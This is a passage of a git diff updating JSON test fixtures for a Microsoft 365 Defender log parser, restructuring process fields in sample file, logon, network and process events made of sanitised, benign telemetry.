/V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-08T14:38:51.904876Z", + "action": { + "properties": { + "RequestAccountSid": "S-1-2-3", + "process": { + "CommandLine": "commandexec.exe /V", + "FileSize": 176128, + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows\u00ae installer", + "VersionInfoInternalFileName": "commandexec", + "VersionInfoOriginalFileName": "commandexec.exe", + "VersionInfoProductName": "Windows Installer - Unicode", + "VersionInfoProductVersion": "5.0.22621.3880" + } + }, + "type": "FileCreated" + }, + "file": { + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 + }, + "host": { + "id": "123456789abcdef", + "name": "device.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "341972" + } + } + }, + "network": { + "protocol": "Local" + }, + "process": { + "args": [ + "/V" + ], + "command_line": "commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "commandexec.exe", + "parent": { + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" + }, + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows\\system32" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + "Syst\u00e8me" + ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json index 497faa7bf..04559806a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json @@ -16,10 +16,12 @@ "@timestamp": "2022-09-01T07:47:58.616127Z", "action": { "properties": { - "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", - "InitiatingProcessFileSize": 66560, - "InitiatingProcessIntegrityLevel": "Medium", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault" + "process": { + "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", + "FileSize": 66560, + "IntegrityLevel": "Medium", + "TokenElevation": "TokenElevationTypeDefault" + } }, "type": "ImageLoaded" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json index 15dc7a41b..e70edf395 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json @@ -17,9 +17,11 @@ "action": { "properties": { "AccountSid": "S-1-1-11-1-1", - "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession", "LogonId": "111111", - "LogonType": "Interactive" + "LogonType": "Interactive", + "process": { + "CommandLine": "WinLogon.exe -SpecialSession" + } }, "type": "LogonSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json index 348f76f4e..75ab306b8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json @@ -16,19 +16,21 @@ "@timestamp": "2023-01-04T14:05:32.314862Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", - "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", - "InitiatingProcessFileSize": 63984520, - "InitiatingProcessIntegrityLevel": "Medium", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel", - "InitiatingProcessVersionInfoInternalFileName": "Excel", - "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft Office", - "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538", "LocalIPType": "Private", - "RemoteIPType": "Public" + "RemoteIPType": "Public", + "process": { + "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", + "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", + "FileSize": 63984520, + "IntegrityLevel": "Medium", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Excel", + "VersionInfoInternalFileName": "Excel", + "VersionInfoOriginalFileName": "Excel.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.15601.20538" + } }, "type": "ConnectionSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index cd2ca7981..7acf31f01 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,9 +29,11 @@ } }, "process": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" + "parent": { + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" + } } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 7d72e6264..3847a138b 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json @@ -17,25 +17,30 @@ "action": { "properties": { "AccountSid": "S-1-1-11", - "InitiatingProcessCommandLine": "\"MsMpEng.exe\"", - "InitiatingProcessFileSize": 133576, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable", - "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe", - "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", - "ProcessVersionInfoInternalFileName": "MpCmdRun", - "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "4.18.2301.6" + "process": { + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", + "VersionInfoInternalFileName": "MpCmdRun", + "VersionInfoOriginalFileName": "MpCmdRun.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "4.18.2301.6", + "parent": { + "CommandLine": "\"MsMpEng.exe\"", + "FileSize": 133576, + "IntegrityLevel": "System", + "LogonId": "999", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Antimalware Service Executable", + "VersionInfoInternalFileName": "MsMpEng.exe", + "VersionInfoOriginalFileName": "MsMpEng.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "4.18.2301.6" + } + } }, "type": "ProcessCreated" }, @@ -69,31 +74,33 @@ "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index d2e83b32a..cac1e9791 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -1,9 +1,15 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 